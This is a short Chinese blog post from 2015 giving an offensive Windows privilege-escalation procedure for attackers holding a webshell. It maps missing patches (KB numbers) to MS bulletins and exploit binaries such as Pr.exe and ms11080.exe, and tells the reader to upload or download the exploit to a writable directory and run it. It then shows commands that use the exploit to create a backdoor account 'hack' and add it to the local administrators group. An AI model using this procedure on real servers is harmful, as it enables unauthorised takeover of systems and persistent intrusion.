1、  查看系统打补丁情况:systeminfo

 

2、  查看KB-EXP表:

 

KB2360937 MS10-084

KB2478960 MS11-014

KB2507938 MS11-056

KB2566454 MS11-062

KB2646524 MS12-003

KB2645640 MS12-009

KB2641653 MS12-018

KB952004 MS09-012 Pr.exe

KB956572 MS09-012 巴西烤肉

KB971657 MS09-041

KB2620712 MS11-097

KB2393802 MS11-011 ms11011.exe

KB942831 MS08-005

KB2503665 MS11-046 ms11046.exe

KB2592799 MS11-080 ms11080.exe

 

这个表以后会不断更新!

 

3、  webshell中查找可读可写可执行的目录,然后上传我们的EXP

 

如果不能上传,则通过下载EXP解决

 

4、  webshell中执行我们的EXP

 

比如:

 

pr.exe “whoami”

 

执行结果:

 

administrator

 

pr.exe “net user hack 1234 /add & net localgroup administrators hack /add”

 

其他的EXP一个道理~

 

EXP可以参考一下暗月的~

posted on 2015-09-22 14:05  milantgh  阅读(1365)  评论(0编辑  收藏  举报